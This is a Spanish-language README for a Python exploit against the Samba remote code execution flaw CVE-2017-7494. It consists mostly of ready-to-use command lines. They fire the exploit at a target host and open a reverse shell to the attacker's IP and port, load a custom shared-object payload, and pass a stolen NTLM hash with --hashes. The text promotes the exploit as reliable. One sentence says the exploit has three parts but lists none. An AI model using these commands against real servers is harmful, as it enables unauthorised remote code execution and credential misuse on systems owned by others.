
CVE-2017-7494 exploit de python
Exploit remoto para la vulnerabilidad SAMBA CVE-2017-7494, también conocida como is_know_pipename!
Este exploit se divide en 3 partes:
Mientras el objetivo sea vulnerable y el payload sea correcto para el sistema operativo y la arquitectura objetivo, el exploit es bastante confiable.
Ejecuta el exploit contra tu objetivo y espera hasta que aparezca la shell:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
Para la versión de samba 3.5.0 > 3.6.0, solo necesitas agregar el argumento -o 1
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
Ejecuta tu propio .so personalizado
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
Para puerto samba personalizado usa el argumento -p
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
En caso de que te encuentres con hashes smbpasswd y no puedas crackearlos, ahora puedes pasar el hash usando el argumento --hashes=LM:NT
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
Este repositorio está inspirado en el repositorio: joxeankoret/exploit-CVE-2017-7494 y Archivaldo